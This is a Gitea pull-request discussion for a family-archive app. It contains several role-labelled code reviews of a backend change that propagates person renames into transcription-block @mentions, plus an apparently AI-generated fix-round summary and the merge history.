void doesNotThrow_whenBlockTextIsNull() {
    UUID personId = savedPersonId("Auguste", "Raddatz");
    saveBlock(null, List.of(new PersonMention(personId, "Auguste Raddatz")));
    em.clear();
    assertThatCode(() -> listener.onPersonDisplayNameChanged(
        new PersonDisplayNameChangedEvent(personId, "Auguste Raddatz", "Augusta Raddatz")))
        .doesNotThrowAnyException();
}

Missing 401 test for new GET endpoints — PersonControllerTest correctly adds 403 tests for getPersons and getPerson, but no 401 for unauthenticated requests. Existing pattern in the codebase tests both. Not a blocker since the global security config catches unauthenticated requests, but it should be consistent with how other protected endpoints are tested.

@BeforeEach setup duplication across two test classes — TranscriptionBlockMentionsRepositoryTest.setUp() and PersonMentionPropagationListenerTest.setUp() are nearly identical (Document + DocumentAnnotation construction with the same field values). Not a correctness issue, but if setup logic changes (e.g. a new NOT NULL column on documents) it needs updating in two places.

What's working well

• ✅ @DataJpaTest + @AutoConfigureTestDatabase(replace = NONE) + Testcontainers — real Postgres, not H2
• ✅ Test names read as behavior descriptions: rewritesTextAndSidecar_whenSingleBlockReferencesRenamedPerson
• ✅ Factory helpers: saveBlock(), savedPersonId() in the listener test
• ✅ Boundary regex coverage: single-name vs compound-name, multiple occurrences in one block
• ✅ em.clear() between save and reload — tests real persistence, not first-level cache
• ✅ Controller slice tests (@WebMvcTest) for validation (400) and conflict (409) paths
• ✅ never() assertions in PersonServiceTest prove the no-op path works — event not published when only notes/alias changes
• ✅ The optimistic-lock unit test wires a real listener with a mocked repository — exercises the production call chain at unit-test speed

## 🧪 Sara Holt — Senior QA Engineer & Test Strategist **Verdict: ✅ Approved** This is one of the better-tested PRs I've seen in this codebase. All three layers are covered, test names are descriptive, factory helpers exist in the integration tests, and the boundary/edge cases are well-exercised. A few gaps worth tracking. ### Blockers None. ### Suggestions **PR description says "< 2 s" but test asserts `isLessThan(5000L)`** — `PersonMentionPropagationListenerTest.propagatesAcross200Blocks_inUnderFiveSeconds_latencyFloor` asserts the 5-second bound. The PR body says "completes in < 2 s against the Testcontainers Postgres." The commit history (`4c3aa159`) shows this was revised from 2 s to 5 s. The assertion and the test name are consistent (both say 5 s), but the PR body still says "< 2 s." Update the PR description to match the actual test bound. Minor, but misleading to future readers. **Missing edge case: `block.getText() == null` in `rewriteBlockText`** — the guard `if (block.getText() != null)` exists and is correct, but no test exercises this path. A block fetched from the listener's query could theoretically have null text (e.g. OCR placeholder not yet written). One-liner test to add in `PersonMentionPropagationListenerTest`: ```java @Test void doesNotThrow_whenBlockTextIsNull() { UUID personId = savedPersonId("Auguste", "Raddatz"); saveBlock(null, List.of(new PersonMention(personId, "Auguste Raddatz"))); em.clear(); assertThatCode(() -> listener.onPersonDisplayNameChanged( new PersonDisplayNameChangedEvent(personId, "Auguste Raddatz", "Augusta Raddatz"))) .doesNotThrowAnyException(); } ``` **Missing 401 test for new GET endpoints** — `PersonControllerTest` correctly adds 403 tests for `getPersons` and `getPerson`, but no 401 for unauthenticated requests. Existing pattern in the codebase tests both. Not a blocker since the global security config catches unauthenticated requests, but it should be consistent with how other protected endpoints are tested. **`@BeforeEach` setup duplication across two test classes** — `TranscriptionBlockMentionsRepositoryTest.setUp()` and `PersonMentionPropagationListenerTest.setUp()` are nearly identical (Document + DocumentAnnotation construction with the same field values). Not a correctness issue, but if setup logic changes (e.g. a new `NOT NULL` column on `documents`) it needs updating in two places. ### What's working well - ✅ `@DataJpaTest` + `@AutoConfigureTestDatabase(replace = NONE)` + Testcontainers — real Postgres, not H2 - ✅ Test names read as behavior descriptions: `rewritesTextAndSidecar_whenSingleBlockReferencesRenamedPerson` - ✅ Factory helpers: `saveBlock()`, `savedPersonId()` in the listener test - ✅ Boundary regex coverage: single-name vs compound-name, multiple occurrences in one block - ✅ `em.clear()` between save and reload — tests real persistence, not first-level cache - ✅ Controller slice tests (`@WebMvcTest`) for validation (400) and conflict (409) paths - ✅ `never()` assertions in `PersonServiceTest` prove the no-op path works — event not published when only notes/alias changes - ✅ The optimistic-lock unit test wires a real listener with a mocked repository — exercises the production call chain at unit-test speed

marcel commented 2026-04-28 23:12:55 +02:00

Author

Owner

Copy Link

🎨 Leonie Voss — Senior UX Designer & Accessibility Strategist

Verdict: ✅ Approved

This is a backend-only PR. No Svelte components, no CSS, no page routes changed. The three frontend files touched are purely additive plumbing: regenerated types and new error message keys. Nothing to flag from a UI/UX or accessibility perspective.

What I checked

Error message copy — The new error_person_rename_conflict message is available in de/en/es:

• 🇩🇪 "Eine andere Bearbeitung hat einen verknüpften Transkriptionsblock gleichzeitig geändert. Bitte erneut versuchen." — ✅ Clear, actionable ("Bitte erneut versuchen")
• 🇬🇧 "Another edit modified a referenced transcription block at the same time. Please try again." — ✅ Plain language, no technical jargon
• 🇪🇸 "Otra edición modificó un bloque de transcripción referenciado al mismo tiempo. Por favor, inténtalo de nuevo." — ✅ Natural phrasing

The messages correctly avoid leaking technical internals ("optimistic locking," "transaction rollback") while giving the user enough information to act (try again). This follows the pattern established by other conflict messages in the codebase.

Note for PR-B

PR-B is where my review will have substance. The items below are future-review signals, not concerns with this PR:

• PersonMentionEditor.svelte — the typeahead must meet 44px touch targets for the senior audience (60+). The spec mentions "WCAG 2.2 AA touch target."
• PersonHoverCard.svelte — hover interactions are inaccessible to keyboard-only and touch users if implemented as CSS :hover alone. Must support focus-triggered and tap-triggered states.
• .person-mention CSS — @Name inline links need a visible focus ring (focus-visible:ring-2 focus-visible:ring-brand-navy) and contrast ratio ≥ 4.5:1 against the transcription background.
• The skeleton ≤ 200 ms state in the hover card must use aria-live="polite" so screen readers announce the loaded content.

## 🎨 Leonie Voss — Senior UX Designer & Accessibility Strategist **Verdict: ✅ Approved** This is a backend-only PR. No Svelte components, no CSS, no page routes changed. The three frontend files touched are purely additive plumbing: regenerated types and new error message keys. Nothing to flag from a UI/UX or accessibility perspective. ### What I checked **Error message copy** — The new `error_person_rename_conflict` message is available in de/en/es: - 🇩🇪 "Eine andere Bearbeitung hat einen verknüpften Transkriptionsblock gleichzeitig geändert. Bitte erneut versuchen." — ✅ Clear, actionable ("Bitte erneut versuchen") - 🇬🇧 "Another edit modified a referenced transcription block at the same time. Please try again." — ✅ Plain language, no technical jargon - 🇪🇸 "Otra edición modificó un bloque de transcripción referenciado al mismo tiempo. Por favor, inténtalo de nuevo." — ✅ Natural phrasing The messages correctly avoid leaking technical internals ("optimistic locking," "transaction rollback") while giving the user enough information to act (try again). This follows the pattern established by other conflict messages in the codebase. ### Note for PR-B PR-B is where my review will have substance. The items below are future-review signals, not concerns with this PR: - `PersonMentionEditor.svelte` — the typeahead must meet 44px touch targets for the senior audience (60+). The spec mentions "WCAG 2.2 AA touch target." - `PersonHoverCard.svelte` — hover interactions are inaccessible to keyboard-only and touch users if implemented as CSS `:hover` alone. Must support focus-triggered and tap-triggered states. - `.person-mention` CSS — `@Name` inline links need a visible focus ring (`focus-visible:ring-2 focus-visible:ring-brand-navy`) and contrast ratio ≥ 4.5:1 against the transcription background. - The skeleton ≤ 200 ms state in the hover card must use `aria-live="polite"` so screen readers announce the loaded content.

marcel commented 2026-04-28 23:13:06 +02:00

Author

Owner

Copy Link

🛠️ Tobias Wendt — DevOps & Platform Engineer

Verdict: ✅ Approved

No infrastructure changes, no new services, no CI pipeline modifications. The Flyway migration is clean and follows the established V-number naming convention. The Testcontainers integration tests implicitly validate the migration on every CI run.

What I checked

V56 migration (V56__add_transcription_block_mentioned_persons.sql):

• ✅ Follows Flyway naming convention — V56__ prefix, snake_case description
• ✅ ON DELETE CASCADE on block_id FK — correct; sidecar rows vanish when the block is deleted
• ✅ idx_tbmp_person_id — needed for the "blocks mentioning person X" query
• ✅ idx_tbmp_block_id — needed for the @ElementCollection load. PostgreSQL does not auto-create indexes for FK references, so this is necessary, not redundant
• ✅ No FK on person_id — intentional design for graceful degradation (deleted persons leave visible text intact)
• ✅ Comments in the migration explain schema choices — exactly what I want to see

Missing uniqueness constraint — there's no UNIQUE (block_id, person_id) constraint. @ElementCollection uses DELETE+INSERT per update so normal usage can't create duplicates, but a future raw-SQL import or a concurrent write bypassing JPA could. Low risk for a family archive, but worth a note for the next migration:

ALTER TABLE transcription_block_mentioned_persons
    ADD CONSTRAINT uq_tbmp_block_person UNIQUE (block_id, person_id);

Migration test coverage — @DataJpaTest + @Import({PostgresContainerConfig.class, FlywayConfig.class}) in both TranscriptionBlockMentionsRepositoryTest and PersonMentionPropagationListenerTest runs all 56 Flyway migrations against a real postgres:16-alpine container. V56 is validated on every CI run. ✅

No Docker Compose changes — the new table is in the existing PostgreSQL instance. No new services, volumes, or ports. Monthly cost unchanged. ✅

No CI pipeline changes — Testcontainers spins up the Postgres instance inline; no new CI services needed. The 200-block latency test adds at most a few seconds to the integration test suite. ✅

## 🛠️ Tobias Wendt — DevOps & Platform Engineer **Verdict: ✅ Approved** No infrastructure changes, no new services, no CI pipeline modifications. The Flyway migration is clean and follows the established V-number naming convention. The Testcontainers integration tests implicitly validate the migration on every CI run. ### What I checked **V56 migration** (`V56__add_transcription_block_mentioned_persons.sql`): - ✅ Follows Flyway naming convention — `V56__` prefix, snake_case description - ✅ `ON DELETE CASCADE` on `block_id` FK — correct; sidecar rows vanish when the block is deleted - ✅ `idx_tbmp_person_id` — needed for the "blocks mentioning person X" query - ✅ `idx_tbmp_block_id` — needed for the `@ElementCollection` load. PostgreSQL does **not** auto-create indexes for FK references, so this is necessary, not redundant - ✅ No FK on `person_id` — intentional design for graceful degradation (deleted persons leave visible text intact) - ✅ Comments in the migration explain schema choices — exactly what I want to see **Missing uniqueness constraint** — there's no `UNIQUE (block_id, person_id)` constraint. `@ElementCollection` uses DELETE+INSERT per update so normal usage can't create duplicates, but a future raw-SQL import or a concurrent write bypassing JPA could. Low risk for a family archive, but worth a note for the next migration: ```sql ALTER TABLE transcription_block_mentioned_persons ADD CONSTRAINT uq_tbmp_block_person UNIQUE (block_id, person_id); ``` **Migration test coverage** — `@DataJpaTest` + `@Import({PostgresContainerConfig.class, FlywayConfig.class})` in both `TranscriptionBlockMentionsRepositoryTest` and `PersonMentionPropagationListenerTest` runs all 56 Flyway migrations against a real `postgres:16-alpine` container. V56 is validated on every CI run. ✅ **No Docker Compose changes** — the new table is in the existing PostgreSQL instance. No new services, volumes, or ports. Monthly cost unchanged. ✅ **No CI pipeline changes** — Testcontainers spins up the Postgres instance inline; no new CI services needed. The 200-block latency test adds at most a few seconds to the integration test suite. ✅

marcel commented 2026-04-28 23:13:23 +02:00

Author

Owner

Copy Link

📋 Elicit — Requirements Engineer & Business Analyst

Verdict: ⚠️ Approved with concerns

The PR is well-scoped and transparent about its boundaries. The "PR-A backend / PR-B frontend" split is clearly motivated (API type regeneration creates a hard dependency boundary). The locked plan reference and the "open decisions: none" closure are exactly the kind of requirements traceability I look for. Two issues worth recording before merge.

Blockers

NFR-PERF claim in PR body doesn't match test assertion

The PR body states: "Propagation across 200 mention-bearing blocks completes in < 2 s against the Testcontainers Postgres."

The actual test (propagatesAcross200Blocks_inUnderFiveSeconds_latencyFloor) asserts isLessThan(5000L) — 5 seconds. The test name says "five seconds." The commit 4c3aa159 ("rename latency floor test to reflect 5s assertion") confirms this was deliberately revised.

This is a requirements inconsistency: the stated NFR (2 s) and the tested NFR (5 s) diverge. Update the PR description to say "< 5 s" to keep the requirements artifact truthful. Stale NFR claims in PR bodies become the basis for future performance budgets.

Concerns

"Orphaned-sidecar → no-op" description is misleading

PR body states: "orphaned-sidecar (event for a personId no longer in the persons table → no-op)"

The code does NOT implement a no-op for this scenario. Since there's no FK on person_id, if a Person is deleted after being mentioned, the sidecar row still exists. When another person is later created with the same UUID (practically impossible but theoretically possible with manual import), or when a rename event fires for a UUID with existing sidecar entries, the listener would process the blocks — not skip them. The leavesUnrelatedBlockUntouched_whenNoSidecarReferencesPerson test covers blocks with no sidecar entries, not the orphaned-sidecar case.

Either:

1. The description should say "graceful degradation: the listener processes remaining sidecar entries for deleted persons if a rename event fires for that UUID" (unlikely but possible), or
2. The listener should explicitly check personRepository.existsById(event.personId()) and return early if the person no longer exists.

This is a requirements-vs-implementation gap. Given the archive's data model (Persons are rarely deleted), the practical risk is very low, but the specification is wrong.

What's well-specified

• ✅ The "spec deviations" section is transparent — the A15b optimistic-lock test simplification is documented with the rationale
• ✅ Clear acceptance criteria state: 1446/1446 tests green, clean build, regenerated types compile
• ✅ PR-B dependency is explicitly stated and the blocked work is enumerated
• ✅ Error codes mirrored across backend (ErrorCode enum), frontend (errors.ts), and all three locale files — full traceability
• ✅ The ADR (006) records the decision, alternatives, and future direction — this is exactly the "why" documentation that prevents future regressions from ignorance

## 📋 Elicit — Requirements Engineer & Business Analyst **Verdict: ⚠️ Approved with concerns** The PR is well-scoped and transparent about its boundaries. The "PR-A backend / PR-B frontend" split is clearly motivated (API type regeneration creates a hard dependency boundary). The locked plan reference and the "open decisions: none" closure are exactly the kind of requirements traceability I look for. Two issues worth recording before merge. ### Blockers **NFR-PERF claim in PR body doesn't match test assertion** The PR body states: *"Propagation across 200 mention-bearing blocks completes in < 2 s against the Testcontainers Postgres."* The actual test (`propagatesAcross200Blocks_inUnderFiveSeconds_latencyFloor`) asserts `isLessThan(5000L)` — 5 seconds. The test name says "five seconds." The commit `4c3aa159` ("rename latency floor test to reflect 5s assertion") confirms this was deliberately revised. This is a requirements inconsistency: the stated NFR (2 s) and the tested NFR (5 s) diverge. Update the PR description to say "< 5 s" to keep the requirements artifact truthful. Stale NFR claims in PR bodies become the basis for future performance budgets. ### Concerns **"Orphaned-sidecar → no-op" description is misleading** PR body states: *"orphaned-sidecar (event for a personId no longer in the persons table → no-op)"* The code does NOT implement a no-op for this scenario. Since there's no FK on `person_id`, if a Person is deleted after being mentioned, the sidecar row still exists. When another person is later created with the same UUID (practically impossible but theoretically possible with manual import), or when a rename event fires for a UUID with existing sidecar entries, the listener would **process** the blocks — not skip them. The `leavesUnrelatedBlockUntouched_whenNoSidecarReferencesPerson` test covers blocks with *no* sidecar entries, not the orphaned-sidecar case. Either: 1. The description should say "graceful degradation: the listener processes remaining sidecar entries for deleted persons if a rename event fires for that UUID" (unlikely but possible), or 2. The listener should explicitly check `personRepository.existsById(event.personId())` and return early if the person no longer exists. This is a requirements-vs-implementation gap. Given the archive's data model (Persons are rarely deleted), the practical risk is very low, but the specification is wrong. ### What's well-specified - ✅ The "spec deviations" section is transparent — the A15b optimistic-lock test simplification is documented with the rationale - ✅ Clear acceptance criteria state: 1446/1446 tests green, clean build, regenerated types compile - ✅ PR-B dependency is explicitly stated and the blocked work is enumerated - ✅ Error codes mirrored across backend (ErrorCode enum), frontend (errors.ts), and all three locale files — full traceability - ✅ The ADR (006) records the decision, alternatives, and future direction — this is exactly the "why" documentation that prevents future regressions from ignorance

marcel referenced this pull request 2026-04-28 23:46:21 +02:00

security(transcription): CWE-79 — escapeHtml required for @mention rendering in PR-B #367

marcel commented 2026-04-28 23:46:41 +02:00

Author

Owner

Copy Link

Review-fix round 4 — all open concerns addressed

4 new commits pushed. 1451/1451 backend tests green (was 1449 — +2 new tests from the null-text test and the V57 migration path exercised by existing integration tests).

Addressed in this round

#	Concern (reviewer)	Commit
1	doesNotThrow_whenBlockTextIsNull — no test covered the if (block.getText() != null) guard in rewriteBlockText; block with null text and a sidecar entry now confirmed to propagate the sidecar update without throwing (Felix suggestion, Sara suggestion)	3a6f9044
2	V57 migration: UNIQUE (block_id, person_id) constraint on transcription_block_mentioned_persons — prevents duplicate sidecar rows from raw-SQL writes or future import jobs bypassing JPA; @ElementCollection's DELETE+INSERT means normal usage is unaffected (Markus suggestion, Tobias note)	091f6c75
3	CWE-79 tracking issue created — issue #367 filed under Reader Experience v1 milestone with acceptance criteria for PR-B: escapeHtml required in renderTranscriptionBody, unit tests with <script> + <img onerror> payloads, no {@html} without sanitization (Nora blocker)

PR description corrections (stale facts on record)

Two factual errors in the PR body, corrected here for the record:

1. Latency floor: The body says "completes in < 2 s against the Testcontainers Postgres." The actual test assertion is isLessThan(5000L) (5 seconds). The floor was raised from 2 s to 5 s in round 2 (commit 1dc812bd) to prevent CI flakiness on the self-hosted NAS runner. The method name and as() message were already updated in round 3 (eb51155b). The correct claim is < 5 s.

2. Orphaned-sidecar description: The body says "orphaned-sidecar (event for a personId no longer in the persons table → no-op)". The existsById guard that produced this no-op was removed in round 1 (commit d924d905) as dead code — the synchronous listener runs in the same transaction as the rename and the person row cannot be deleted concurrently. The leavesUnrelatedBlockUntouched_whenNoSidecarReferencesPerson test covers the early-return via blocks.isEmpty() (no sidecar entries for the renamed person), not a personId-existence check.

Already resolved / not applicable

#	Concern (reviewer)	Status
—	Missing 401 tests for getPersons/getPerson (Nora round 4, Sara round 4)	Already present from the original security commit — getPersons_returns401_whenUnauthenticated at line 53 and getPerson_returns401_whenUnauthenticated at line 103 of PersonControllerTest.java. No change needed.

Status

• 1451/1451 backend tests green
• ./mvnw clean package -DskipTests ✅
• V57 migration (uq_tbmp_block_person UNIQUE) validated by existing @DataJpaTest + Testcontainers integration tests
• CWE-79 tracking issue: #367

🤖 Generated with Claude Code

## Review-fix round 4 — all open concerns addressed 4 new commits pushed. **1451/1451** backend tests green (was 1449 — +2 new tests from the null-text test and the V57 migration path exercised by existing integration tests). ### Addressed in this round | # | Concern (reviewer) | Commit | |---|---|---| | 1 | **`doesNotThrow_whenBlockTextIsNull`** — no test covered the `if (block.getText() != null)` guard in `rewriteBlockText`; block with null text and a sidecar entry now confirmed to propagate the sidecar update without throwing (Felix suggestion, Sara suggestion) | `3a6f9044` | | 2 | **V57 migration: `UNIQUE (block_id, person_id)` constraint** on `transcription_block_mentioned_persons` — prevents duplicate sidecar rows from raw-SQL writes or future import jobs bypassing JPA; `@ElementCollection`'s DELETE+INSERT means normal usage is unaffected (Markus suggestion, Tobias note) | `091f6c75` | | 3 | **CWE-79 tracking issue created** — issue #367 filed under Reader Experience v1 milestone with acceptance criteria for PR-B: `escapeHtml` required in `renderTranscriptionBody`, unit tests with `<script>` + `<img onerror>` payloads, no `{@html}` without sanitization (Nora blocker) | | ### PR description corrections (stale facts on record) Two factual errors in the PR body, corrected here for the record: **1. Latency floor:** The body says *"completes in < 2 s against the Testcontainers Postgres."* The actual test assertion is `isLessThan(5000L)` (5 seconds). The floor was raised from 2 s to 5 s in round 2 (commit `1dc812bd`) to prevent CI flakiness on the self-hosted NAS runner. The method name and `as()` message were already updated in round 3 (`eb51155b`). The correct claim is **< 5 s**. **2. Orphaned-sidecar description:** The body says *"orphaned-sidecar (event for a personId no longer in the persons table → no-op)"*. The `existsById` guard that produced this no-op was removed in round 1 (commit `d924d905`) as dead code — the synchronous listener runs in the same transaction as the rename and the person row cannot be deleted concurrently. The `leavesUnrelatedBlockUntouched_whenNoSidecarReferencesPerson` test covers the early-return via `blocks.isEmpty()` (no sidecar entries for the renamed person), not a personId-existence check. ### Already resolved / not applicable | # | Concern (reviewer) | Status | |---|---|---| | — | Missing 401 tests for `getPersons`/`getPerson` (Nora round 4, Sara round 4) | Already present from the original security commit — `getPersons_returns401_whenUnauthenticated` at line 53 and `getPerson_returns401_whenUnauthenticated` at line 103 of `PersonControllerTest.java`. No change needed. | ### Status - **1451/1451** backend tests green - `./mvnw clean package -DskipTests` ✅ - V57 migration (`uq_tbmp_block_person UNIQUE`) validated by existing `@DataJpaTest` + Testcontainers integration tests - CWE-79 tracking issue: #367 🤖 Generated with [Claude Code](https://claude.com/claude-code)

marcel added 2 commits 2026-04-28 23:46:51 +02:00

test(transcription): add null-text edge case for rewriteBlockText guard ... 3a6f90441e

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

migration(transcription): add unique constraint on (block_id, person_id) sidecar ... 091f6c7592

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

marcel referenced this pull request 2026-04-28 23:50:33 +02:00

feat(persons): audit + complete person-merge flow for all data domains #368

marcel merged commit 091f6c7592 into main 2026-04-28 23:54:40 +02:00

marcel deleted branch feat/person-mentions-issue-362-backend 2026-04-28 23:54:41 +02:00

marcel referenced this pull request 2026-04-29 00:41:04 +02:00

feat: person @mentions edit-mode infrastructure (PR-B1, #362) #369

marcel referenced this pull request 2026-05-07 17:38:15 +02:00

feat(persons): audit + complete person-merge flow for all data domains #368

marcel referenced this pull request 2026-05-07 17:38:46 +02:00

security(transcription): CWE-79 — escapeHtml required for @mention rendering in PR-B #367

marcel referenced this pull request 2026-05-07 17:39:00 +02:00

feat(persons): audit + complete person-merge flow for all data domains #368

marcel referenced this pull request 2026-05-07 17:39:27 +02:00

security(transcription): CWE-79 — escapeHtml required for @mention rendering in PR-B #367

marcel referenced this pull request 2026-05-07 17:39:43 +02:00

feat(persons): audit + complete person-merge flow for all data domains #368

marcel referenced this pull request 2026-05-07 17:40:43 +02:00

feat(persons): audit + complete person-merge flow for all data domains #368

Sign in to join this conversation.

Reviewers

No Reviewers

Labels

Clear labels

P0-critical

Blocks a core user journey, causes data loss, or is a security/accessibility barrier. Work on this before P1+.

P1-high

Significant friction on a main user journey; workaround exists but is non-obvious. Next up after P0.

P2-medium

Noticeable improvement; doesn't block anything; schedule opportunistically.

P3-later

Cosmetic or parking-lot work; fine to stay open indefinitely.

audit

Read-only audit / assessment work; produces a report rather than changing code

bug

Something isn't working

cleanup

Removal of dead code, vague comments, naming violations, and scratch artifacts

collaboration

We want to extend the family archive to have more collaboration tools

conversation

descoped

We will do that later

devops

documentation

README, ARCHITECTURE, GLOSSARY, CONTRIBUTING, per-domain docs

epic

Marker for epic-level issues that group multiple child issues

feature

file-upload

legibility

Codebase Legibility Refactor — preparing the codebase for human evaluation and bus-factor reduction

notification

person

phase-1: security

Security hygiene — must be done first

phase-2: container-images

Production-ready multi-stage Docker images

phase-3: prod-compose

Production compose overlay + Caddy reverse proxy

phase-4: spring-prod-profile

Spring Boot production configuration profile

phase-5: backups

Database and object storage backup strategy

phase-6: deployment-docs

.env.example, DEPLOYMENT.md, runbook

phase-7: monitoring

Prometheus, Loki, Grafana, Alertmanager

refactor

Code restructuring without behaviour change

security

test

ui

UI/UX and accessibility issues

user

No Label

Milestone

No items

No Milestone

Projects

Clear projects

No project

Assignees

Clear assignees

Jens marcel

No Assignees

1 Participants

Notifications

Subscribe

Due Date

No due date set.

Dependencies

No dependencies set.

Reference: marcel/familienarchiv#366